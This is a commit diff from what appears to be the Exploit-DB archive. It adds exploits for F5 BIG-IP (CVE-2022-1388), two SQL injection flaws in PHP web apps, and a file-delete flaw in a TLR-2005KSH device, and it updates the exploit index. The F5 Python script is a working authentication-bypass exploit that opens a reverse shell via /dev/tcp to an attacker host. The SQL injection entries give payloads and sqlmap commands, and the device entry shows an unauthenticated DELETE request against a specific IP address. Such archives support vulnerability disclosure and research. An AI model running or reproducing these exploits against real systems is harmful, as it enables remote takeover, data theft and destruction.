DB: 2022-05-13

7 changes to exploits/shellcodes Wondershare Dr.Fone 12.0.7 - Privilege Escalation (InstallAssistService) Wondershare Dr.Fone 12.0.7 - Remote Code Execution (RCE) F5 BIG-IP 16.0.x - Remote Code Execution (RCE) College Management System 1.0 - 'course_code' SQL Injection (Authenticated) Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated) TLR-2005KSH - Arbitrary File Delete
2022-05-13 05:01:39 +00:00 · 2022-05-13 05:01:39 +00:00 · 6b9b8c5434
commit 6b9b8c5434
parent be24992411
6 changed files with 213 additions and 2 deletions
--- a/exploits/hardware/webapps/50935.txt
+++ b/exploits/hardware/webapps/50935.txt
@ -0,0 +1,21 @@
+# Exploit Title: TLR-2005KSH - Arbitrary File Delete
+# Date: 2022-05-11
+# Exploit Author: Ahmed Alroky
+# Author Company : AIactive
+# Version: 1.0.0
+# Vendor home page : http://telesquare.co.kr/
+# Authentication Required: No
+# Tested on: Windows
+# CVE: CVE-2021-46424
+
+# Proof-of-Concept
+# Request
+
+DELETE /cgi-bin/test2.txt HTTP/1.1
+Host: 220.89.223.215:8083
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
--- a/exploits/multiple/remote/50932.py
+++ b/exploits/multiple/remote/50932.py
@ -0,0 +1,66 @@
+# Exploit Title: F5 BIG-IP 16.0.x - Remote Code Execution (RCE)
+# Exploit Author: Yesith Alvarez
+# Vendor Homepage: https://www.f5.com/products/big-ip-services
+# Version: 16.0.x
+# CVE : CVE-2022-1388
+
+from requests import Request, Session
+import sys
+import json
+
+
+
+def title():
+    print('''
+
+   _______      ________    ___   ___ ___  ___       __ ____   ___   ___
+  / ____\ \    / /  ____|  |__ \ / _ \__ \|__ \     /_ |___ \ / _ \ / _ \
+ | |     \ \  / /| |__ ______ ) | | | | ) |  ) |_____| | __) | (_) | (_) |
+ | |      \ \/ / |  __|______/ /| | | |/ /  / /______| ||__ < > _ < > _ <
+ | |____   \  /  | |____    / /_| |_| / /_ / /_      | |___) | (_) | (_) |
+  \_____|   \/   |______|  |____|\___/____|____|     |_|____/ \___/ \___/
+
+
+
+Author: Yesith Alvarez
+Github: https://github.com/yealvarez
+Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
+    ''')
+
+def exploit(url, lhost, lport):
+	url = url + 'mgmt/tm/util/bash'
+	data = {
+		"command":"run",
+		"utilCmdArgs":"-c 'bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1'"
+
+	}
+	headers = {
+		'Authorization': 'Basic YWRtaW46',
+		'Connection':'keep-alive, X-F5-Auth-Token',
+		'X-F5-Auth-Token': '0'
+
+	}
+	s = Session()
+	req = Request('POST', url, json=data, headers=headers)
+	prepped = req.prepare()
+	del prepped.headers['Content-Type']
+	resp = s.send(prepped,
+	    verify=False,
+	    timeout=15
+	)
+	#print(prepped.headers)
+	#print(url)
+	#print(resp.headers)
+	#print(resp.json())
+	print(resp.status_code)
+
+
+if __name__ == '__main__':
+    title()
+    if(len(sys.argv) < 4):
+    	print('[+] USAGE: python3 %s https://<target_url> lhost lport\n'%(sys.argv[0]))
+    	print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.11 4444\n'%(sys.argv[0]))
+    	print('[+] Do not forget to run the listener: nc -lvp 4444\n')
+    	exit(0)
+    else:
+    	exploit(sys.argv[1],sys.argv[2],sys.argv[3])
--- a/exploits/php/webapps/50933.txt
+++ b/exploits/php/webapps/50933.txt
@ -0,0 +1,54 @@
+# Exploit Title: College Management System - 'course_code' SQL Injection (Authenticated)
+# Date: 2022-24-03
+# Exploit Author: Eren Gozaydin
+# Vendor Homepage: https://code-projects.org/college-management-system-in-php-with-source-code/
+# Software Link: https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f
+# Version: 1.0
+# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51
+# CVE: CVE-2022-28079
+# References: https://nvd.nist.gov/vuln/detail/CVE-2022-28079
+
+------------------------------------------------------------------------------------
+
+1. Description:
+----------------------
+
+College Management System 1.0 allows SQL Injection via parameter 'course_code' in
+/College-Management-System/admin/asign-single-student-subjects.php. Exploiting this issue could allow an attacker to compromise
+the application, access or modify data, or exploit latent vulnerabilities
+in the underlying database.
+
+
+2. Proof of Concept:
+----------------------
+
+In Burpsuite intercept the request from the affected page with
+'course_code' parameter and save it like poc.txt Then run SQLmap to extract the
+data from the database:
+
+sqlmap -r poc.txt --dbms=mysql
+
+
+3. Example payload:
+----------------------
+
+boolean-based blind
+Payload: submit=Press&roll_no=3&course_code=-6093' OR 2121=2121 AND 'ddQQ'='ddQQ
+
+
+4. Burpsuite request:
+----------------------
+
+POST /College-Management-System/admin/asign-single-student-subjects.php HTTP/1.1
+Host: localhost
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-us,en;q=0.5
+Cache-Control: no-cache
+Content-Length: 80
+Content-Type: application/x-www-form-urlencoded
+Cookie: PHPSESSID=jhnlvntmv8q4gtgsof9l1f1hhe
+Referer: http://localhost/College-Management-System/admin/asign-single-student-subjects.php
+User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
+
+submit=Press&roll_no=3&course_code=Select+Course%27+OR+1%3d1+OR+%27ns%27%3d%27ns
--- a/exploits/php/webapps/50934.txt
+++ b/exploits/php/webapps/50934.txt
@ -0,0 +1,66 @@
+# Exploit Title: Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated)
+# Date: 2022-26-03
+# Exploit Author: Eren Gozaydin
+# Vendor Homepage: https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
+# Version: 1.0
+# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51
+# CVE: CVE-2022-28080
+# References: https://nvd.nist.gov/vuln/detail/CVE-2022-28080
+
+------------------------------------------------------------------------------------
+
+1. Description:
+----------------------
+
+Royal Event Management System 1.0 allows SQL Injection via parameter 'todate' in
+/royal_event/btndates_report.php#?=  Exploiting this issue could allow an attacker to compromise
+the application, access or modify data, or exploit latent vulnerabilities
+in the underlying database.
+
+
+2. Proof of Concept:
+----------------------
+
+In Burpsuite intercept the request from the affected page with
+'todate' parameter and save it like poc.txt. Then run SQLmap to extract the
+data from the database:
+
+sqlmap -r poc.txt --dbms=mysql
+
+
+3. Example payload:
+----------------------
+
+(boolean-based)
+
+-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns
+
+4. Burpsuite request:
+----------------------
+
+POST /royal_event/btndates_report.php#?= HTTP/1.1
+Host: localhost
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-us,en;q=0.5
+Cache-Control: no-cache
+Content-Length: 334
+Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0
+Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380
+Referer: http://localhost/royal_event/btndates_report.php#?=
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
+
+--f289a6438bcc45179bcd3eb7ddc555d0
+Content-Disposition: form-data; name="todate"
+
+-1' OR 1=1 OR 'ns'='ns
+--f289a6438bcc45179bcd3eb7ddc555d0
+Content-Disposition: form-data; name="search"
+
+3
+--f289a6438bcc45179bcd3eb7ddc555d0
+Content-Disposition: form-data; name="fromdate"
+
+01/01/2011
+--f289a6438bcc45179bcd3eb7ddc555d0--
--- a/exploits/windows/remote/50913.py
+++ b/exploits/windows/remote/50913.py
@ -1,4 +1,4 @@
-# Exploit Title: Wondershare Dr.Fone 12.0.7 - Privilege Escalation (InstallAssistService)
+# Exploit Title: Wondershare Dr.Fone 12.0.7 - Remote Code Execution (RCE)
 # Date: 4/27/2022
 # Exploit Author: Netanel Cohen & Tomer Peled
 # Vendor Homepage: https://drfone.wondershare.net/
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11486,7 +11486,6 @@ id,file,description,date,author,type,platform,port
 50903,exploits/windows/local/50903.txt,"Wondershare Dr.Fone 11.4.10 - Insecure File Permissions",1970-01-01,AkuCyberSec,local,windows,
 50911,exploits/linux/local/50911.py,"ExifTool 12.23 - Arbitrary Code Execution",1970-01-01,UNICORD,local,linux,
 50912,exploits/windows/local/50912.py,"Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)",1970-01-01,"Netanel Cohen",local,windows,
-50913,exploits/windows/local/50913.py,"Wondershare Dr.Fone 12.0.7 - Privilege Escalation (InstallAssistService)",1970-01-01,"Netanel Cohen",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -18688,6 +18687,8 @@ id,file,description,date,author,type,platform,port
 50904,exploits/windows/remote/50904.py,"ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure",1970-01-01,"Metin Yunus Kandemir",remote,windows,
 50906,exploits/hardware/remote/50906.txt,"DLINK DIR850 - Insecure Access Control",1970-01-01,"Ahmed Alroky",remote,hardware,
 50907,exploits/hardware/remote/50907.txt,"DLINK DIR850 - Open Redirect",1970-01-01,"Ahmed Alroky",remote,hardware,
+50913,exploits/windows/remote/50913.py,"Wondershare Dr.Fone 12.0.7 - Remote Code Execution (RCE)",1970-01-01,"Netanel Cohen",remote,windows,
+50932,exploits/multiple/remote/50932.py,"F5 BIG-IP 16.0.x - Remote Code Execution (RCE)",1970-01-01,"Yesith Alvarez",remote,multiple,
 50914,exploits/linux/remote/50914.py,"Apache CouchDB 3.2.1 - Remote Code Execution (RCE)",1970-01-01,"Konstantin Burov",remote,linux,
 50916,exploits/hardware/remote/50916.txt,"Tenda HG6 v3.3.0 - Remote Command Injection",1970-01-01,LiquidWorm,remote,hardware,
 50917,exploits/multiple/remote/50917.js,"Google Chrome 78.0.3904.70 - Remote Code Execution",1970-01-01,"Forrest Orr",remote,multiple,
@ -44994,3 +44995,6 @@ id,file,description,date,author,type,platform,port
 50925,exploits/php/webapps/50925.html,"WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)",1970-01-01,"Abisheik M",webapps,php,
 50927,exploits/php/webapps/50927.txt,"Joomla Plugin SexyPolling 2.1.7 - SQLi",1970-01-01,"Wolfgang Hotwagner",webapps,php,
 50928,exploits/php/webapps/50928.txt,"WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)",1970-01-01,"Hassan Khan Yusufzai",webapps,php,
+50933,exploits/php/webapps/50933.txt,"College Management System 1.0 - 'course_code' SQL Injection (Authenticated)",1970-01-01,"Eren Gozaydin",webapps,php,
+50934,exploits/php/webapps/50934.txt,"Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated)",1970-01-01,"Eren Gozaydin",webapps,php,
+50935,exploits/hardware/webapps/50935.txt,"TLR-2005KSH - Arbitrary File Delete",1970-01-01,"Ahmed Alroky",webapps,hardware,